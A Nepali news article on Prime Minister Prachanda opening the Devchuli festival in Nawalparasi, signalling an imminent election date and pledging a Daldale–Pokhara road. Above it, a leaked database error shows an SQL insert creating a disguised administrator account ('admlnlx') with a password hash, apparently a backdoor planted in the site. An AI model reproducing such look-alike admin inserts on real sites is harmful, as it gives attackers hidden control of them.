WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bn0JSLRQn9U8tsdU8Mz8rsT7lZK20v/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:16:12', '', 'admlnlx', 'admlnlx')
ज्ञानु पंगेनी
नवलपरासी ,फागुन ६-
प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले निर्वाचनको मिति घोषणका लागी सरकार अन्तिम तयारीमा रहेको वताएका छन् । राजनितिक स्थीरताका निर्वाचन आवश्यक भएकाले छिट्टै निर्वाचनको मिति घोषणा हुने उनले वताए । शुक्रवारबाट नवलपरासीको दलदलेमा शुरु भएको देवचुली महोत्सवको उद्घाटन गर्दै प्रधानमन्त्री दाहालले निर्वाचनका लागी तयार रहन सवैलाई आग्रह गरे ।
प्रधानन्त्री दाहालले असन्तुष्ट पक्ष मधेशी ,आदिवासी जनजाती ,थारु समुदायका माग पनि अधिकतम सम्बोधन गरेर राष्ट्रिय एकता कायम गर्नतर्फ आफु लागि परेको बताए । लामो संघर्षपछि आएको परिवर्तनलाई उल्टाउन खोज्नेलाई कदापी सफल हुन नदिने प्रचण्डको भनाई छ ।
यस्तै प्रधानमन्त्री प्रचण्डले दलदले ,भिमाद हुदै पोखरा जोडने सडक निर्माणको लागी सरकारको तर्फबाट पहल गर्ने प्रतिबद्धता समेत जनाए । प्रदेश ४ को नवलपुरक्षेत्र अन्र्तगतको दलदले पोखरा सडक समयमा निर्माण गर्नसके नवलपरासीको अर्थतन्त्रमा क्रान्ति आउने उनको भनाई थियो ।
देवचुली उद्योग बाणिज्य संघको आयोजनामा शुरु भएको महोत्सव फागुन १६ गतेसम्म चल्ने छ ।